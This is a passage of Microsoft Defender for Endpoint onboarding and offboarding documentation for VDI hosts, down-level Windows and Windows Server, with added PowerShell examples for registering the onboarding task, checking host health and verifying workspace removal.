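The steps above define the task through the GPMC. The following PowerShell script is an added example, not code from this article or from the onboarding package, that registers the equivalent task on a single host with Register-ScheduledTask, which is useful for validating a golden image or a test host outside Group Policy. It reproduces the same settings: the NT AUTHORITY\SYSTEM principal, highest run level, and a powershell.exe action with the arguments from step 6. It assumes an elevated session, uses an at-startup trigger instead of a one-shot immediate task, and keeps the script location as the same placeholder path used above (replace it with your share).

```powershell
# Added example (not from the Microsoft page): register, on one AVD host, the
# scheduled task that the GPMC steps above create through Group Policy.
# Assumptions: elevated session; $ScriptPath is a placeholder for your read-only
# share; the trigger is "at startup" rather than a one-shot immediate task.
param(
    [string]$ScriptPath = '\\Path\To\Onboard-NonPersistentMachine.ps1',
    [string]$TaskName   = 'MDE VDI Onboarding'
)

# The task runs as SYSTEM, so the computer account must be able to read the
# share. Fail early if the script is not reachable from this host.
if (-not (Test-Path -LiteralPath $ScriptPath)) {
    throw "Onboarding script not found at $ScriptPath"
}

$powershellExe = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'

# Step 6: Start a program -> powershell.exe -ExecutionPolicy Bypass -command "& '<script>'"
# (the path is quoted so that a share name containing spaces still works)
$action = New-ScheduledTaskAction -Execute $powershellExe `
    -Argument ('-ExecutionPolicy Bypass -command "& ''{0}''"' -f $ScriptPath)

# Run as early as possible in the boot process (see the note above).
$trigger = New-ScheduledTaskTrigger -AtStartup

# Steps 4-5: run as NT AUTHORITY\SYSTEM, whether or not a user is logged on,
# with highest privileges. ServiceAccount is the logon type for built-in accounts.
$principal = New-ScheduledTaskPrincipal -UserId 'NT AUTHORITY\SYSTEM' `
    -LogonType ServiceAccount -RunLevel Highest

# Do not let power settings skip the run on a freshly provisioned host.
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries `
    -DontStopIfGoingOnBatteries -StartWhenAvailable

Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
    -Principal $principal -Settings $settings -Force | Out-Null

# Print what was registered so it can be compared with the GPO definition.
Get-ScheduledTask -TaskName $TaskName |
    Select-Object TaskName, State,
        @{ n = 'RunAs';    e = { $_.Principal.UserId } },
        @{ n = 'RunLevel'; e = { $_.Principal.RunLevel } },
        @{ n = 'Command';  e = { $_.Actions[0].Execute + ' ' + $_.Actions[0].Arguments } }
```

Run it once on a test host, compare the printed RunAs, RunLevel and Command values against the GPO, and then remove the local task before sealing the golden image so that the policy-delivered task is the only one that runs.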

Scenario 3: Onboarding using management tools

If you plan to manage your machines using a management tool, you can onboard
devices with Microsoft Endpoint Configuration Manager.

For more information, see Onboard Windows devices using Configuration Manager.

Warning

If you plan to use attack surface reduction rules (see Attack surface reduction rules
reference), note that the rule "Block process creations originating from PSExec and
WMI commands" should not be used, because that rule is incompatible with
management through Microsoft Endpoint Configuration Manager. The rule blocks WMI
commands that the Configuration Manager client uses to function correctly.

Tip

After onboarding the device, you can choose to run a detection test to verify that
the device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Microsoft Defender for Endpoint device.

Tagging your machines when building your golden image

As part of your onboarding, you may want to consider setting a machine tag to
differentiate AVD machines more easily in the Microsoft Security Center. For more
information, see Add device tags by setting a registry key value.

Other recommended configuration settings

When building your golden image, you may want to configure initial protection settings
as well. For more information, see Other recommended configuration settings.
Also, if you're using FSLogix user profiles, we recommend you follow the guidance
described in FSLogix antivirus exclusions.

Licensing requirements

Note on licensing: When using Windows Enterprise multi-session, depending on your
requirements, you can choose to either have all users licensed through Microsoft
Defender for Endpoint (per user), Windows Enterprise E5, Microsoft 365 E5 Security, or
Microsoft 365 E5, or have the VM licensed through Microsoft Defender for Cloud.
Licensing requirements for Microsoft Defender for Endpoint can be found at: Licensing
requirements.

Related Links

Add exclusions for Defender for Endpoint via PowerShell
FSLogix anti-malware exclusions
Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop
infrastructure environment

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Onboard previous versions of Windows
Article • 03/08/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Platforms

Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows 8.1 Pro
Windows 8.1 Enterprise
Windows Server 2008 R2 SP1

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint extends support to include down-level operating systems,
providing advanced attack detection and investigation capabilities on supported
Windows versions.

To onboard down-level Windows client endpoints to Defender for Endpoint, you'll need
to:

Configure and update System Center Endpoint Protection clients
Install and configure Microsoft Monitoring Agent (MMA) to report sensor data

For Windows Server 2008 R2 SP1, you have the option of onboarding through Microsoft
Defender for Cloud.

Note

A Defender for Endpoint standalone server license is required, per node, in order to
onboard a Windows server through Microsoft Monitoring Agent (Option 1).
Alternatively, a Microsoft Defender for servers license is required, per node, in order
to onboard a Windows server through Microsoft Defender for Cloud (Option 2); see
Supported features available in Microsoft Defender for Cloud.

Tip

After onboarding the device, you can choose to run a detection test to verify that it
is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Defender for Endpoint endpoint.

Configure and update System Center Endpoint Protection clients

Defender for Endpoint integrates with System Center Endpoint Protection to provide
visibility to malware detections and to stop propagation of an attack in your
organization by banning potentially malicious files or suspected malware.

The following steps are required to enable this integration:

Install the January 2017 anti-malware platform update for Endpoint Protection
clients
Configure the SCEP client Cloud Protection Service membership to the Advanced
setting
Configure your network to allow connections to the Microsoft Defender Antivirus
cloud. For more information, see Configure and validate Microsoft Defender
Antivirus network connections

Install and configure Microsoft Monitoring Agent (MMA)

Before you begin

Review the following details to verify minimum system requirements:

Install the February 2018 monthly update rollup - Direct download link from the
Windows Update catalog is available here

Install the March 12, 2019 (or later) Servicing stack update - Direct download link
from the Windows Update catalog is available here

Install the SHA-2 code signing support update - Direct download link from the
Windows Update catalog is available here

Note

Only applicable for Windows Server 2008 R2, Windows 7 SP1 Enterprise, and
Windows 7 SP1 Pro.

Install the Update for customer experience and diagnostic telemetry

Install Microsoft .NET Framework 4.5.2 or later

Note

Installation of .NET 4.5 might require you to restart your computer after
installation.

Meet the Azure Log Analytics agent minimum system requirements. For more
information, see Collect data from computers in your environment with Log
Analytics

Installation steps

1. Download the agent setup file: Windows 64-bit agent or Windows 32-bit agent.

Note

Due to the deprecation of SHA-1 support by the MMA agent, the MMA
agent needs to be version 10.20.18029 or newer.

2. Obtain the workspace ID:

In the Defender for Endpoint navigation pane, select Settings > Device
management > Onboarding
Select the operating system
Copy the workspace ID and workspace key

3. Using the Workspace ID and Workspace key, choose any of the following
installation methods to install the agent:

Manually install the agent using setup.

On the Agent Setup Options page, select Connect the agent to Azure Log
Analytics (OMS)

Install the agent using the command line.

Configure the agent using a script.

Note

If you are a US Government customer, under "Azure Cloud" you'll need to
choose "Azure US Government" if using the setup wizard, or, if using a
command line or a script, set the
"OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1.

4. If you're using a proxy to connect to the Internet, see the Configure proxy and
Internet connectivity settings section.

Once completed, you should see onboarded endpoints in the portal within an hour.

Configure proxy and Internet connectivity settings

If your servers need to use a proxy to communicate with Defender for Endpoint, use one
of the following methods to configure the MMA to use the proxy server:

Configure the MMA to use a proxy server
Configure Windows to use a proxy server for all connections

If a proxy or firewall is in use, please ensure that servers can access all of the Microsoft
Defender for Endpoint service URLs directly and without SSL interception. For more
information, see enable access to Microsoft Defender for Endpoint service URLs. Use of
SSL interception will prevent the system from communicating with the Defender for
Endpoint service.

Once completed, you should see onboarded Windows servers in the portal within an
hour.

Onboard Windows servers through Microsoft Defender for Cloud

1. In the Microsoft Defender XDR navigation pane, select Settings > Endpoints >
Device management > Onboarding.

2. Select Windows Server 2008 R2 SP1 as the operating system.

3. Click Onboard Servers in Microsoft Defender for Cloud.

4. Follow the onboarding instructions in Microsoft Defender for Endpoint with
Microsoft Defender for Cloud and, if you are using Azure Arc, follow the
onboarding instructions in Enabling the Microsoft Defender for Endpoint
integration.

After completing the onboarding steps, you'll need to Configure and update System
Center Endpoint Protection clients.

Note

For onboarding via Microsoft Defender for servers to work as expected, the
server must have an appropriate workspace and key configured within the
Microsoft Monitoring Agent (MMA) settings.
Once configured, the appropriate cloud management pack is deployed on the
machine and the sensor process (MsSenseS.exe) will be deployed and started.
This is also required if the server is configured to use an OMS Gateway server
as proxy.

Verify onboarding

Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are
running.

Note

Running Microsoft Defender Antivirus is not required but it is recommended. If
another antivirus vendor product is the primary endpoint protection solution, you
can run Defender Antivirus in Passive mode. You can only confirm that passive
mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is
running.

Note

As Microsoft Defender Antivirus is only supported for Windows 10 and Windows
11, step 1 does not apply when running Windows Server 2008 R2 SP1.

1. Run the following command to verify that Microsoft Defender Antivirus is installed:

dos

sc.exe query Windefend

If the result is 'The specified service doesn't exist as an installed service', then you'll
need to install Microsoft Defender Antivirus. For more information, see Microsoft
Defender Antivirus in Windows 10.

For information on how to use Group Policy to configure and manage Microsoft
Defender Antivirus on your Windows servers, see Use Group Policy settings to
configure and manage Microsoft Defender Antivirus.

If you encounter issues with onboarding, see Troubleshoot onboarding.

Run a detection test

Follow the steps in Run a detection test on a newly onboarded device to verify that the
server is reporting to the Defender for Endpoint service.

Onboarding endpoints with no management solution

Using Group Policy

Step 1: Download the corresponding update for your endpoint.

1. Navigate to c:\windows\sysvol\domain\scripts (Change control could be needed
on one of the domain controllers.)

2. Create a folder named MMA.

3. Download the following and place them in the MMA folder:

Update for customer experience and diagnostic telemetry:
For Windows Server 2008 R2 x64

For Windows Server 2008 R2 SP1, the following updates are also required:

February 2018 Monthly Roll up - KB4074598 (Windows Server 2008 R2)
Microsoft Update Catalog
Download updates for Windows Server 2008 R2 x64
.NET Framework 3.5.1 (KB3154518)
For Windows Server 2008 R2 x64

Note

This article assumes you are using x64-based servers (MMA Agent .exe x64
New SHA-2 compliant version).

Step 2: Create a file named DeployMMA.cmd (using Notepad) and add the following
lines to the cmd file. Note that you'll need your WORKSPACE ID and KEY.

The following command is an example. Replace the following values:

KB - Use the applicable KB relevant to the endpoint you're onboarding
Workspace ID and KEY - Use your ID and key

dos

@echo off
cd "C:"
REM Do nothing if the Microsoft Monitoring Agent is already installed, so the
REM script is safe to run repeatedly (startup script, immediate or daily task).
IF EXIST "C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe" (
exit
) ELSE (
REM Install the prerequisite updates quietly, without forcing a restart.
wusa.exe C:\Windows\MMA\Windows6.1-KB3080149-x64.msu /quiet /norestart
wusa.exe C:\Windows\MMA\Windows6.1-KB4074598-x64.msu /quiet /norestart
wusa.exe C:\Windows\MMA\Windows6.1-KB3154518-x64.msu /quiet /norestart
wusa.exe C:\Windows\MMA\Windows8.1-KB3080149-x64.msu /quiet /norestart
REM Extract the MMA setup package, then install it attached to the workspace.
"c:\windows\MMA\MMASetup-AMD64.exe" /c /t:"C:\Windows\MMA"
c:\windows\MMA\setup.exe /qn NOAPM=1 ADD_OPINSIGHTS_WORKSPACE=1 OPINSIGHTS_WORKSPACE_ID="<your workspace ID>" OPINSIGHTS_WORKSPACE_KEY="<your workspace key>" AcceptEndUserLicenseAgreement=1
)

Group Policy Configuration

Create a new group policy specifically for onboarding devices such as "Microsoft
Defender for Endpoint Onboarding".

Create a Group Policy Folder named "c:\windows\MMA"

This will add a new folder on every server that gets the GPO applied, called
MMA, and will be stored in c:\windows. This will contain the installation files for
the MMA, prerequisites, and install script.

Create a Group Policy Files preference for each of the files stored in Net logon.

It copies the files from DOMAIN\NETLOGON\MMA\filename to
C:\windows\MMA\filename - so the installation files are local to the server:

Repeat the process but create item level targeting on the COMMON tab, so the file only
gets copied to the appropriate platform/Operating system version in scope:

For Windows Server 2008 R2 you'll need (and it will only copy down) the following:

Windows6.1-KB3080149-x64.msu
Windows6.1-KB3154518-x64.msu
Windows6.1-KB4074598-x64.msu

Once this is done, you'll need to create a start-up script policy:

The name of the file to run here is c:\windows\MMA\DeployMMA.cmd. Once the server
is restarted as part of the start-up process it will install the Update for customer
experience and diagnostic telemetry KB, and then install the MMA Agent, while setting
the Workspace ID and Key, and the server will be onboarded.

You could also use an immediate task to run DeployMMA.cmd if you don't want to
reboot all the servers.

This could be done in two phases. First create the files and the folder in GPO. Give the
system time to ensure the GPO has been applied, and all the servers have the install
files. Then, add the immediate task. This will achieve the same result without requiring a
reboot.

As the script has an exit method and won't re-run if the MMA is installed, you could also
use a daily scheduled task to achieve the same result. Similar to a Configuration
Manager compliance policy, it will check daily to ensure the MMA is present.

As mentioned in the onboarding documentation for Windows Server 2008 R2 SP1
specifically, ensure that you fulfill the following requirements:

Install the February 2018 monthly update rollup
Install either .NET framework 4.5 (or later) or KB3154518

Please check the KBs are present before onboarding Windows Server 2008 R2. This
process allows you to onboard all the servers if you don't have Configuration Manager
managing Servers.

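The article says to check that the KBs are present before onboarding and, in the Verify onboarding section above, to confirm that the antivirus and the SENSE sensor are running. The following PowerShell function is an added example, not code from this article, that does both checks on one down-level host: it looks for the three KBs named above with Get-HotFix, confirms the MMA is installed at the SHA-2 capable version from the note above (10.20.18029 or later), lists the workspaces attached to the agent, and reports the state of the WinDefend and Sense services and the MsSenseS.exe sensor process. Assumptions: an x64 host with PowerShell 3.0 or later, that MonitoringHost.exe carries the agent version in its file version, and that the workspace objects returned by the agent's COM interface expose a workspaceId property.

```powershell
# Added example (not from the Microsoft page): pre-flight and post-onboarding
# health check for an MMA-based Windows Server 2008 R2 SP1 / Windows 7 SP1 host.
# Assumptions: x64 host, PowerShell 3.0+, Get-HotFix sees the updates (it reads
# Win32_QuickFixEngineering), MonitoringHost.exe file version = agent version.
function Test-DownLevelMdeHost {
    param(
        # KBs listed on this page for Windows Server 2008 R2 SP1 onboarding.
        [string[]]$RequiredKb = @('KB3080149', 'KB4074598', 'KB3154518'),
        # Minimum MMA version from the SHA-1 deprecation note above.
        [version]$MinMmaVersion = [version]'10.20.18029'
    )

    $result = [ordered]@{}

    # 1. Are the prerequisite updates installed?
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    $result.MissingKb = @($RequiredKb | Where-Object { $installed -notcontains $_ })

    # 2. Is the MMA present (same path DeployMMA.cmd tests) and new enough?
    $mmaHost = Join-Path $env:ProgramFiles 'Microsoft Monitoring Agent\Agent\MonitoringHost.exe'
    if (Test-Path -LiteralPath $mmaHost) {
        $ver = [version](Get-Item -LiteralPath $mmaHost).VersionInfo.FileVersion
        $result.MmaVersion   = $ver
        $result.MmaVersionOk = ($ver -ge $MinMmaVersion)
    } else {
        $result.MmaVersion   = $null
        $result.MmaVersionOk = $false
    }

    # 3. Which workspaces is the agent attached to? Same COM object the
    #    offboarding section uses; 'workspaceId' property name is an assumption.
    try {
        $cfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg
        $result.Workspaces = @($cfg.GetCloudWorkspaces() | ForEach-Object { $_.workspaceId })
    } catch {
        $result.Workspaces = @()   # COM class absent = agent not installed
    }

    # 4. Service state. "The specified service doesn't exist" from
    #    'sc.exe query Windefend' shows up here as NotInstalled.
    foreach ($svc in 'WinDefend', 'Sense') {
        $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
        $result[$svc] = if ($s) { $s.Status.ToString() } else { 'NotInstalled' }
    }
    # On MMA-onboarded servers the sensor runs as MsSenseS.exe (see note above).
    $result.MsSenseSRunning = [bool](Get-Process -Name MsSenseS -ErrorAction SilentlyContinue)

    [pscustomobject]$result
}

Test-DownLevelMdeHost | Format-List
```

Run it before deploying DeployMMA.cmd to confirm MissingKb is empty, and again after the reboot or immediate task to confirm MmaVersionOk, a Workspaces entry, and MsSenseSRunning; on Windows Server 2008 R2 SP1 a WinDefend value of NotInstalled is expected, as the note in Verify onboarding explains.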
Offboard endpoints

You have two options to offboard Windows endpoints from the service:

Uninstall the MMA agent
Remove the Defender for Endpoint workspace configuration

Note

Offboarding causes the Windows endpoint to stop sending sensor data to the
portal, but data from the endpoint, including reference to any alerts it has had, will
be retained for up to 6 months.

Uninstall the MMA agent

To offboard the Windows endpoint, you can uninstall the MMA agent or detach it from
reporting to your Defender for Endpoint workspace. After offboarding the agent, the
endpoint will no longer send sensor data to Defender for Endpoint. For more
information, see To disable an agent.

Remove the Defender for Endpoint workspace configuration

You can use either of the following methods:

Remove the Defender for Endpoint workspace configuration from the MMA agent
Run a PowerShell command to remove the configuration

Remove the Defender for Endpoint workspace configuration from the MMA agent

1. In the Microsoft Monitoring Agent Properties, select the Azure Log Analytics
(OMS) tab.

2. Select the Defender for Endpoint workspace, and click Remove.

Run a PowerShell command to remove the configuration

1. Get your Workspace ID:
a. In the navigation pane, select Settings > Onboarding.
b. Select the relevant operating system and get your Workspace ID.

2. Open an elevated PowerShell and run the following command, replacing
WorkspaceID with the Workspace ID you obtained:

PowerShell

$AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg

# Remove OMS Workspace
$AgentCfg.RemoveCloudWorkspace("WorkspaceID")

# Reload the configuration and apply changes
$AgentCfg.ReloadConfiguration()
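The two lines above remove the workspace unconditionally. The following script is an added example, not code from this article, that wraps the same AgentConfigManager.MgmtSvcCfg calls so that the removal is verified: it lists the workspaces attached to the agent, refuses to proceed if the given ID is not among them (a typo in the ID would otherwise silently do nothing), and after ReloadConfiguration() confirms the workspace is gone. It assumes an elevated session and that the objects returned by GetCloudWorkspaces() expose a workspaceId property.

```powershell
# Added example (not from the Microsoft page): offboard from the Defender for
# Endpoint workspace with a before/after check. Assumptions: elevated session;
# GetCloudWorkspaces() returns objects with a 'workspaceId' property.
param(
    [Parameter(Mandatory = $true)]
    [string]$WorkspaceId    # the Workspace ID from Settings > Onboarding
)

$AgentCfg = New-Object -ComObject AgentConfigManager.MgmtSvcCfg

function Get-AttachedWorkspaceIds {
    # Returns the IDs of every Log Analytics (OMS) workspace the agent reports to.
    @($AgentCfg.GetCloudWorkspaces() | ForEach-Object { $_.workspaceId })
}

$before = Get-AttachedWorkspaceIds
Write-Host "Workspaces attached before: $($before -join ', ')"

if ($before -notcontains $WorkspaceId) {
    Write-Warning "Workspace $WorkspaceId is not attached to this agent; nothing to remove."
    return
}

# Same two calls as the page's snippet: remove the workspace, then apply.
$AgentCfg.RemoveCloudWorkspace($WorkspaceId)
$AgentCfg.ReloadConfiguration()

$after = Get-AttachedWorkspaceIds
if ($after -contains $WorkspaceId) {
    throw "Workspace $WorkspaceId is still attached after ReloadConfiguration()."
}
Write-Host "Workspace $WorkspaceId removed. Remaining: $($after -join ', ')"
```

If the agent also reports to other Log Analytics workspaces (for example, monitoring), the script leaves them untouched and prints them under Remaining, which is the check that distinguishes offboarding from uninstalling the agent.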


Defender for Endpoint onboarding Windows Server
Article • 11/15/2023

Applies to:

Windows Server 2008 R2
Windows Server 2012 R2
Windows Server 2016
Windows Server Semi-Annual Enterprise Channel
Windows Server 2019 and later
Windows Server 2019 core edition
Windows Server 2022
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

You'll need to go through the onboarding section of the Defender for Endpoint portal to
onboard any of the supported devices. Depending on the device, you'll be guided with
appropriate steps and provided management and deployment tool options suitable for
the device.

Defender for Endpoint extends support to also include the Windows Server operating
system. This support provides advanced attack detection and investigation capabilities
seamlessly through the Microsoft Defender XDR console. Support for Windows Server
provides deeper insight into server activities, coverage for kernel and memory attack
detection, and enables response actions.

This topic describes how to onboard specific Windows servers to Microsoft Defender for
Endpoint.

For guidance on how to download and use Windows Security Baselines for Windows
servers, see Windows Security Baselines.

Windows Server onboarding overview

You'll need to complete the following general steps to successfully onboard servers
2008 R2, 2012 R2, 2016, 2019, 2022.

Windows Server 2012 R2 and Windows Server 2016

Download installation and onboarding packages.
Apply the installation package.
Follow the onboarding steps for the corresponding tool.

Windows Server Semi-Annual Enterprise Channel and Windows Server 2019

Download the onboarding package.
Follow the onboarding steps for the corresponding tool.

Offboard Windows servers

You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server
(SAC), Windows Server 2019, and Windows Server 2019 Core edition with the same
method available for Windows 10 client devices.

Offboard devices using Configuration Manager
Offboard and monitor devices using Mobile Device Management tools
Offboard devices using Group Policy
Offboard devices using a local script

After offboarding, you can proceed to uninstall the unified solution package on
Windows Server 2012 R2 and Windows Server 2016.
For other Windows server versions, you have two options to offboard Windows servers
from the service:

Uninstall the MMA agent
Remove the Defender for Endpoint workspace configuration

Note

These offboarding instructions for other Windows server versions also apply if you
are running the previous Microsoft Defender for Endpoint for Windows Server 2016
and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the
new unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.

Related topics
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using Group Policy
Onboard non-persistent virtual desktop infrastructure (VDI) devices


Onboard Windows servers to the Microsoft Defender for Endpoint service
Article • 07/12/2023

Applies to:

Windows Server 2012 R2
Windows Server 2016
Windows Server Semi-Annual Enterprise Channel
Windows Server 2019 and later
Windows Server 2019 core edition
Windows Server 2022
Microsoft Defender for Endpoint

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint extends support to also include the Windows Server operating
system. This support provides advanced attack detection and investigation capabilities
seamlessly through the Microsoft Defender XDR console. Support for Windows Server
provides deeper insight into server activities, coverage for kernel and memory attack
detection, and enables response actions.

This article describes how to onboard specific Windows servers to Microsoft Defender
for Endpoint.

For guidance on how to download and use Windows Security Baselines for Windows
servers, see Windows Security Baselines.

Windows Server onboarding overview

You'll need to complete the following general steps to successfully onboard servers.

Note

Windows Hyper-V Server editions are not supported.

Integration with Microsoft Defender for Servers:

Microsoft Defender for Endpoint integrates seamlessly with Microsoft Defender for
Servers. You can onboard servers automatically, have servers monitored by Microsoft
Defender for Cloud appear in Defender for Endpoint, and conduct detailed
investigations as a Microsoft Defender for Cloud customer. For more information, please
go to Protect your endpoints with Defender for Cloud's integrated EDR solution:
Microsoft Defender for Endpoint.

Note

For Windows Server 2012 R2 and 2016, you can either manually install/upgrade the
modern, unified solution on these machines, or use the integration to automatically
deploy or upgrade servers covered by your respective Microsoft Defender for
Server plan. More information about making the switch is at Protect your endpoints
with Defender for Cloud's integrated EDR solution: Microsoft Defender for
Endpoint.

When you use Microsoft Defender for Cloud to monitor servers, a Defender
for Endpoint tenant is automatically created (in the US for US users, in the EU
for European users, and in the UK for UK users). Data collected by Defender
for Endpoint is stored in the geo-location of the tenant as identified during
provisioning.
If you use Defender for Endpoint before using Microsoft Defender for Cloud,
your data will be stored in the location you specified when you created your
tenant even if you integrate with Microsoft Defender for Cloud at a later time.
Once configured, you cannot change the location where your data is stored. If
you need to move your data to another location, you need to contact
Microsoft Support to reset the tenant.
Server endpoint monitoring utilizing this integration has been disabled for
Office 365 GCC customers.
Previously, the use of the Microsoft Monitoring Agent (MMA) on Windows
Server 2016 and previous versions of Windows Server allowed for the OMS /
Log Analytics gateway to provide connectivity to Defender cloud services. The
new solution, like Microsoft Defender for Endpoint on Windows Server 2019,
Windows Server 2022, and Windows 10, doesn't support this gateway.
Linux servers onboarded through Microsoft Defender for Cloud will have their
initial configuration set to run Defender Antivirus in passive mode.

Windows Server 2012 R2 and Windows Server 2016:

Download installation and onboarding packages
Apply the installation package
Follow the onboarding steps for the corresponding tool

Windows Server Semi-Annual Enterprise Channel and Windows Server 2019:

Download the onboarding package
Follow the onboarding steps for the corresponding tool

Windows Server 2012 R2 and Windows Server 2016

New Windows Server 2012 R2 and 2016 functionality in the modern unified solution

The previous implementation (before April of 2022) of onboarding Windows Server
2012 R2 and Windows Server 2016 required the use of Microsoft Monitoring Agent
(MMA).
The new unified solution package makes it easier to onboard servers by removing
dependencies and installation steps. It also provides a much expanded feature set. For
more information, please refer to Defending Windows Server 2012 R2 and 2016.

Depending on the server that you're onboarding, the unified solution installs Microsoft
Defender Antivirus and/or the EDR sensor. The following table indicates which
component is installed by the package and which is built in by default.

Server version                AV                        EDR
Windows Server 2012 R2        Installed by the package  Installed by the package
Windows Server 2016           Built-in                  Installed by the package
Windows Server 2019 or later  Built-in                  Built-in

If you've previously onboarded your servers using MMA, follow the guidance provided
in Server migration to migrate to the new solution.

Important

Before proceeding with onboarding, see the section Known issues and limitations
in the new, unified solution package for Windows Server 2012 R2 and 2016.

Prerequisites

Prerequisites for Windows Server 2012 R2

If you've fully updated your machines with the latest monthly rollup package, there
are no other prerequisites and the requirements below will already be met.

The installer package will check if the following components have already been installed
via an update to assess if minimum requirements have been met for a successful
installation:

Update for customer experience and diagnostic telemetry
Update for Universal C Runtime in Windows
Security Update for Windows Server 2012 R2 (KB3045999)

Prerequisites for Windows Server 2016

It's recommended to install the latest available SSU and LCU on the server.

The Servicing Stack Update (SSU) from September 14, 2021 or later must be
installed.
The Latest Cumulative Update (LCU) from September 20, 2018 or later must be
installed.
Enable the Microsoft Defender Antivirus feature and ensure it's up to date. For
more information on enabling Defender Antivirus on Windows Server, see
Re-enable Defender Antivirus on Windows Server if it was disabled and Re-enable
Defender Antivirus on Windows Server if it was uninstalled.
Download and install the latest platform version using Windows Update.
Alternatively, download the update package manually from the Microsoft Update
Catalog or from MMPC.

Prerequisites for running with third-party security solutions

If you intend to use a third-party anti-malware solution, you'll need to run Microsoft
Defender Antivirus in passive mode. You must remember to set it to passive mode during
the installation and onboarding process.

Note

If you're installing Microsoft Defender for Endpoint on servers with McAfee
Endpoint Security (ENS) or VirusScan Enterprise (VSE), the version of the McAfee
platform may need to be updated to ensure Microsoft Defender Antivirus is not
removed or disabled. For more information, including the specific version numbers
required, see the McAfee Knowledge Center article.

Update packages for Microsoft Defender for Endpoint on Windows Server 2012 R2
and 2016

To receive regular product improvements and fixes for the EDR Sensor component,
ensure Windows Update KB5005292 gets applied or approved. In addition, to keep
protection components updated, see Manage Microsoft Defender Antivirus updates and
apply baselines.

If you're using Windows Server Update Services (WSUS) and/or Microsoft Endpoint
Configuration Manager, this new "Microsoft Defender for Endpoint update for EDR
Sensor" is available under the category "Microsoft Defender for Endpoint".

Onboarding steps summary

STEP 1: Download the installation and onboarding packages
STEP 2: Apply the installation and onboarding package
STEP 3: Complete the onboarding steps

STEP 1: Download installation and onboarding packages

You'll need to download both the installation and onboarding packages from the
portal.

Note

The installation package is updated monthly. Be sure to download the latest
package before usage. To update after installation, you do not have to run the
installer package again. If you do, the installer will ask you to offboard first as that
is a requirement for uninstallation. See Update packages for Microsoft Defender
for Endpoint on Windows Server 2012 R2 and 2016.

Note

On Windows Server 2012 R2, Microsoft Defender Antivirus will get installed by the
installation package and will be active unless you set it to passive mode. On
Windows Server 2016, Microsoft Defender Antivirus must be installed as a feature
(see Switch to MDE) first and fully updated before proceeding with the installation.

If you are running a non-Microsoft anti-malware solution, ensure you add
exclusions for Microsoft Defender Antivirus (from this list of Microsoft Defender
Processes on the Defender Processes tab) to the non-Microsoft solution before
installation. It is also recommended to add non-Microsoft security solutions to the
Defender Antivirus exclusion list.

The installation package contains an MSI file that installs the Microsoft Defender for
Endpoint agent.

The onboarding package contains the following file:

WindowsDefenderATPOnboardingScript.cmd - contains the onboarding script

Follow these steps to download the packages:

1. In Microsoft Defender XDR, go to Settings > Endpoint > Onboarding.

2. Select Windows Server 2012 R2 and 2016.

3. Select Download installation package and save the .msi file.

4. Select Download onboarding package and save the .zip file.

5. Install the installation package using any of the options to install Microsoft
Defender Antivirus. The installation requires administrative permissions.

Important

A local onboarding script is suitable for a proof of concept but should not be used
for production deployment. For a production deployment, we recommend using
Group Policy, or Microsoft Endpoint Configuration Manager.

STEP 2: Apply the installation and onboarding package


In this step, you'll install the prevention and detection components required before
onboarding your device to the Microsoft Defender for Endpoint cloud environment, to
prepare the machine for onboarding. Ensure all prerequisites have been met.

Note

Microsoft Defender Antivirus will get installed and will be active unless you set it to
passive mode.

Options to install the Microsoft Defender for Endpoint packages


In the previous section, you downloaded an installation package. The installation
package contains the installer for all Microsoft Defender for Endpoint components.

You can use any of the following options to install the agent:

Install using the command line
Install using a script
Apply the installation and onboarding packages using Group Policy

Install Microsoft Defender For Endpoint using the command line

Use the installation package from the previous step to install Microsoft Defender for
Endpoint.

Run the following command to install Microsoft Defender for Endpoint:

Console

Msiexec /i md4ws.msi /quiet

To uninstall, ensure the machine is offboarded first using the appropriate offboarding
script. Then, use Control Panel > Programs > Programs and Features to perform the
uninstall.

Alternatively, run the following uninstall command to uninstall Microsoft Defender for
Endpoint:

Console

Msiexec /x md4ws.msi /quiet

You must use the same package you used for installation for the above command to
succeed.

The /quiet switch suppresses all notifications.

Note

Microsoft Defender Antivirus doesn't automatically go into passive mode. You can
choose to set Microsoft Defender Antivirus to run in passive mode if you are
running a non-Microsoft antivirus/antimalware solution. For command line
installations, the optional FORCEPASSIVEMODE=1 immediately sets the Microsoft
Defender Antivirus component to Passive mode to avoid interference. Then, to
ensure Defender Antivirus remains in passive mode after onboarding to support
capabilities like EDR Block, set the "ForceDefenderPassiveMode" registry key.

Support for Windows Server provides deeper insight into server activities, coverage for
kernel and memory attack detection, and enables response actions.

Install Microsoft Defender for Endpoint using a script

You can use the installer helper script to help automate installation, uninstallation, and
onboarding.

Note

The installation script is signed. Any modifications to the script will invalidate the
signature. When you download the script from GitHub, the recommended
approach to avoid inadvertent modification is to download the source files as a zip
archive then extract it to obtain the install.ps1 file (on the main Code page, click the
Code dropdown menu and select "Download ZIP").

This script can be used in various scenarios, including those scenarios described in
Server migration scenarios from the previous, MMA-based Microsoft Defender for
Endpoint solution and for deployment using Group Policy as described below.

Apply the Microsoft Defender for Endpoint installation and onboarding packages using Group Policy

